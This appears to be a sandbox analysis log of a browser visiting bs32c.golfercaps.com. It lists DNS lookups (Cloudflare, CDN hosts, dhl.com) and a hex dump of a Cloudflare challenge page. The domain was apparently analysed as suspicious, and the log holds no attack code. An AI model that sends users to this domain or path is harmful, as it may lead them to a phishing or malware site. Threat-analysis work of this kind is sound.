                                                                  Dec 30, 2024 22:42:17.396168947 CET53520721.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.537615061 CET53515091.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:18.145009041 CET6059453192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:18.145210028 CET5749453192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:18.146362066 CET5741553192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:18.146784067 CET5752953192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:18.152268887 CET53605941.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:18.152499914 CET53574941.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:18.154088974 CET53574151.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:18.154895067 CET53575291.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:24.989392996 CET138138192.168.2.4192.168.2.255
                                                                  Dec 30, 2024 22:42:28.272284985 CET53618421.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:28.441792965 CET53628981.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.176976919 CET5292053192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.177262068 CET5740453192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.177771091 CET4923653192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.178014040 CET5535753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.178805113 CET6322053192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.179013014 CET5382353192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.180049896 CET5823953192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.180243015 CET6246453192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.183697939 CET53529201.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.184154987 CET53574041.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.184523106 CET53492361.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.184861898 CET53553571.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.185910940 CET53538231.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.186244011 CET53650571.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.186866999 CET53632201.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.187297106 CET53582391.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.187308073 CET53624641.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.898041964 CET5261753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.898302078 CET5139353192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.899131060 CET5125653192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.899264097 CET6037553192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.904822111 CET53526171.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.904834986 CET53513931.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.905711889 CET53512561.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.906141996 CET53603751.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.981821060 CET5421353192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.981977940 CET6164153192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.987343073 CET5169153192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.987513065 CET5917353192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:33.988549948 CET53542131.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.988696098 CET53616411.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.994143009 CET53516911.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:33.994652033 CET53591731.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:34.329875946 CET53637071.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:39.590869904 CET53509251.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:47.099251032 CET53616791.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:43:05.980299950 CET5307753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:43:05.980360031 CET5607453192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:43:09.446621895 CET53556061.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:43:09.972915888 CET53621771.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.367703915 CET6140453192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:43:16.367867947 CET6281753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:43:16.374485970 CET53614041.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.374602079 CET53628171.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Dec 30, 2024 22:42:15.709770918 CET192.168.2.41.1.1.1c27e(Port unreachable)Destination Unreachable
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 30, 2024 22:42:14.205156088 CET192.168.2.41.1.1.10x33a9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:14.205296993 CET192.168.2.41.1.1.10x594eStandard query (0)www.google.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:15.674926996 CET192.168.2.41.1.1.10xe7bfStandard query (0)bs32c.golfercaps.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:15.675173998 CET192.168.2.41.1.1.10x6066Standard query (0)bs32c.golfercaps.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:16.358761072 CET192.168.2.41.1.1.10xd1a7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:16.359158993 CET192.168.2.41.1.1.10xe45fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.368752956 CET192.168.2.41.1.1.10x1e9eStandard query (0)bs32c.golfercaps.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.368752956 CET192.168.2.41.1.1.10x25adStandard query (0)bs32c.golfercaps.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.388881922 CET192.168.2.41.1.1.10xef2bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.389431000 CET192.168.2.41.1.1.10xebb5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.145009041 CET192.168.2.41.1.1.10xa31aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.145210028 CET192.168.2.41.1.1.10x8976Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.146362066 CET192.168.2.41.1.1.10xca20Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.146784067 CET192.168.2.41.1.1.10xa8a3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.176976919 CET192.168.2.41.1.1.10xbc4aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.177262068 CET192.168.2.41.1.1.10x9853Standard query (0)code.jquery.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.177771091 CET192.168.2.41.1.1.10x4424Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.178014040 CET192.168.2.41.1.1.10x4615Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.178805113 CET192.168.2.41.1.1.10xb13cStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.179013014 CET192.168.2.41.1.1.10x2c95Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.180049896 CET192.168.2.41.1.1.10x2863Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.180243015 CET192.168.2.41.1.1.10x82b1Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.898041964 CET192.168.2.41.1.1.10x7b16Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.898302078 CET192.168.2.41.1.1.10x50a6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.899131060 CET192.168.2.41.1.1.10xbcd7Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.899264097 CET192.168.2.41.1.1.10xa676Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.981821060 CET192.168.2.41.1.1.10x1eb1Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.981977940 CET192.168.2.41.1.1.10x4e23Standard query (0)code.jquery.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.987343073 CET192.168.2.41.1.1.10xad02Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.987513065 CET192.168.2.41.1.1.10xdca7Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:43:05.980299950 CET192.168.2.41.1.1.10x25eeStandard query (0)www.dhl.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:43:05.980360031 CET192.168.2.41.1.1.10x4234Standard query (0)www.dhl.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:43:16.367703915 CET192.168.2.41.1.1.10x9d68Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:43:16.367867947 CET192.168.2.41.1.1.10x2b03Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 30, 2024 22:42:14.211935043 CET1.1.1.1192.168.2.40x594eNo error (0)www.google.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:14.212524891 CET1.1.1.1192.168.2.40x33a9No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:15.687344074 CET1.1.1.1192.168.2.40xe7bfNo error (0)bs32c.golfercaps.com188.114.96.3A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:15.687344074 CET1.1.1.1192.168.2.40xe7bfNo error (0)bs32c.golfercaps.com188.114.97.3A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:15.709697008 CET1.1.1.1192.168.2.40x6066No error (0)bs32c.golfercaps.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:16.365602970 CET1.1.1.1192.168.2.40xd1a7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.382975101 CET1.1.1.1192.168.2.40x25adNo error (0)bs32c.golfercaps.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.395664930 CET1.1.1.1192.168.2.40xef2bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.395664930 CET1.1.1.1192.168.2.40xef2bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.396168947 CET1.1.1.1192.168.2.40xebb5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.537615061 CET1.1.1.1192.168.2.40x1e9eNo error (0)bs32c.golfercaps.com188.114.97.3A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:17.537615061 CET1.1.1.1192.168.2.40x1e9eNo error (0)bs32c.golfercaps.com188.114.96.3A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.152268887 CET1.1.1.1192.168.2.40xa31aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.152268887 CET1.1.1.1192.168.2.40xa31aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.152499914 CET1.1.1.1192.168.2.40x8976No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.154088974 CET1.1.1.1192.168.2.40xca20No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.154088974 CET1.1.1.1192.168.2.40xca20No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:18.154895067 CET1.1.1.1192.168.2.40xa8a3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.183697939 CET1.1.1.1192.168.2.40xbc4aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.183697939 CET1.1.1.1192.168.2.40xbc4aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.183697939 CET1.1.1.1192.168.2.40xbc4aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.183697939 CET1.1.1.1192.168.2.40xbc4aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.184523106 CET1.1.1.1192.168.2.40x4424No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.184523106 CET1.1.1.1192.168.2.40x4424No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.184861898 CET1.1.1.1192.168.2.40x4615No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.185910940 CET1.1.1.1192.168.2.40x2c95No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.186866999 CET1.1.1.1192.168.2.40xb13cNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.186866999 CET1.1.1.1192.168.2.40xb13cNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.187297106 CET1.1.1.1192.168.2.40x2863No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.187297106 CET1.1.1.1192.168.2.40x2863No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.187308073 CET1.1.1.1192.168.2.40x82b1No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.904822111 CET1.1.1.1192.168.2.40x7b16No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.904822111 CET1.1.1.1192.168.2.40x7b16No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.904834986 CET1.1.1.1192.168.2.40x50a6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.905711889 CET1.1.1.1192.168.2.40xbcd7No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.905711889 CET1.1.1.1192.168.2.40xbcd7No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.906141996 CET1.1.1.1192.168.2.40xa676No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.988549948 CET1.1.1.1192.168.2.40x1eb1No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.988549948 CET1.1.1.1192.168.2.40x1eb1No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.988549948 CET1.1.1.1192.168.2.40x1eb1No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.988549948 CET1.1.1.1192.168.2.40x1eb1No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.994143009 CET1.1.1.1192.168.2.40xad02No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.994143009 CET1.1.1.1192.168.2.40xad02No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 22:42:33.994652033 CET1.1.1.1192.168.2.40xdca7No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                  Dec 30, 2024 22:43:05.988056898 CET1.1.1.1192.168.2.40x4234No error (0)www.dhl.comwww.dhl.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 30, 2024 22:43:05.989208937 CET1.1.1.1192.168.2.40x25eeNo error (0)www.dhl.comwww.dhl.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 30, 2024 22:43:16.374485970 CET1.1.1.1192.168.2.40x9d68No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                  • bs32c.golfercaps.com
                                                                  • https:
                                                                    • challenges.cloudflare.com
                                                                    • cdnjs.cloudflare.com
                                                                    • code.jquery.com
                                                                    • stackpath.bootstrapcdn.com
                                                                    • maxcdn.bootstrapcdn.com
                                                                  • a.nel.cloudflare.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449740188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:16 UTC672OUTGET /vfd23ced/ HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:16 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:42:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:42:16 UTC915INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 54 6a 4c 38 39 66 42 4a 62 35 5a 31 4a 6d 54 66 49 6c 65 6a 32 53 58 33 48 49 45 70 41 2f 68 39 67 62 70 6d 6b 47 67 7a 63 4b 43 75 56 43 33 73 37 6e 6c 4b 41 31 65 76 76 6c 4a 52 68 53 77 49 50 4e 72 75 36 2b 7a 42 51 51 4f 55 4a 6d 79 2b 4b 36 35 65 6c 71 56 35 55 79 73 50 58 62 7a 31 57 55 4b 62 70 34 77 4c 36 59 38 3d 24 78 71 73 64 59 44 6a 34 41 37 52 6c 72 37 63 35 5a 53 47 63 64 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: TjL89fBJb5Z1JmTfIlej2SX3HIEpA/h9gbpmkGgzcKCuVC3s7nlKA1evvlJRhSwIPNru6+zBQQOUJmy+K65elqV5UysPXbz1WUKbp4wL6Y8=$xqsdYDj4A7Rlr7c5ZSGcdg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 32 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 231b<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                  Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 4f 78 6e 5f 45 38 48 6e 61 62 37 48 6a 43 46 57 62 6f 50 79 73 64 76 61 42 70 71 66 42 77 71 53 55 6a 56 31 52 6b 77 48 64 67 42 6a 39 5f 4d 2e 70 65 47 46 69 78 57 5a 4a 4d 5f 34 77 71 48 63 4e 59 2e 42 35 54 34 58 37 34 50 53 50 77 59 56 53 51 30 36 33 33 78 42 51 45 36 30 59 6f 48 6e 50 53 43 7a 67 5f 6c 45 38 57 4f 37 5a 74 4a 4a 30 76 6f 6c 4d 4b 4d 32 68 2e 74 2e 37 37 71 77 43 61 79 43 4c 70 77 4c 45 4b 2e 63 75 4c 30 75 5f 2e 39 39 32 57 62 4d 42 4d 62 48 53 65 30 6d 4d 41 4c 37 32 6b 68 58 6e 36 6b 6d 32 41 32 6c 4b 5a 4e 78 69 30 57 47 5f 30 59 6b 39 6f 67 43 4b 6a 77 77 35 4e 37 4e 73 6d 2e 5f 4e 4d 61 44 4c 50 38 59 37 56 6e 37 36 37 36 58 58 58 70 30 76 62 37 5a 74 32 42 4c 6a 51 6a 59 58 70 38 61 31 35 6e 62 43 56 64 39 42 61 7a 75 42 6e 6b
                                                                  Data Ascii: Oxn_E8Hnab7HjCFWboPysdvaBpqfBwqSUjV1RkwHdgBj9_M.peGFixWZJM_4wqHcNY.B5T4X74PSPwYVSQ0633xBQE60YoHnPSCzg_lE8WO7ZtJJ0volMKM2h.t.77qwCayCLpwLEK.cuL0u_.992WbMBMbHSe0mMAL72khXn6km2A2lKZNxi0WG_0Yk9ogCKjww5N7Nsm._NMaDLP8Y7Vn7676XXXp0vb7Zt2BLjQjYXp8a15nbCVd9BazuBnk
                                                                  2024-12-30 21:42:16 UTC1369INData Raw: 71 55 62 74 65 5a 57 42 65 55 76 69 56 43 51 4e 36 37 77 4e 50 39 76 77 6d 6b 6d 70 54 55 79 54 47 43 58 66 30 55 57 75 4b 32 49 4a 6e 41 32 48 66 4c 4f 42 54 6f 75 6e 6d 41 4a 57 72 76 36 46 66 34 49 79 75 6f 64 36 52 4a 66 64 6d 6e 32 78 54 72 5a 30 6b 68 30 6d 4e 6e 6d 56 76 64 32 49 49 67 66 77 42 39 4b 36 41 4d 4b 34 31 77 45 4c 6f 6d 6c 66 74 6b 47 41 64 67 72 52 35 5f 4e 59 4c 2e 39 78 6c 56 5a 76 49 62 56 35 62 58 4b 38 4f 46 76 6e 76 46 54 54 69 44 49 78 70 5a 73 4e 31 4e 41 43 57 59 57 42 6a 37 56 5f 41 43 74 72 74 41 64 65 43 78 38 58 42 77 66 74 37 38 56 77 34 6c 33 5f 74 6a 71 4f 2e 7a 46 74 5a 65 67 67 36 76 55 5a 74 62 4f 58 56 50 36 55 77 6e 47 36 6d 64 31 37 39 57 55 43 77 59 6c 63 66 70 62 62 72 58 49 42 74 6e 52 2e 5a 47 4f 68 44 70 62
                                                                  Data Ascii: qUbteZWBeUviVCQN67wNP9vwmkmpTUyTGCXf0UWuK2IJnA2HfLOBTounmAJWrv6Ff4Iyuod6RJfdmn2xTrZ0kh0mNnmVvd2IIgfwB9K6AMK41wELomlftkGAdgrR5_NYL.9xlVZvIbV5bXK8OFvnvFTTiDIxpZsN1NACWYWBj7V_ACtrtAdeCx8XBwft78Vw4l3_tjqO.zFtZegg6vUZtbOXVP6UwnG6md179WUCwYlcfpbbrXIBtnR.ZGOhDpb
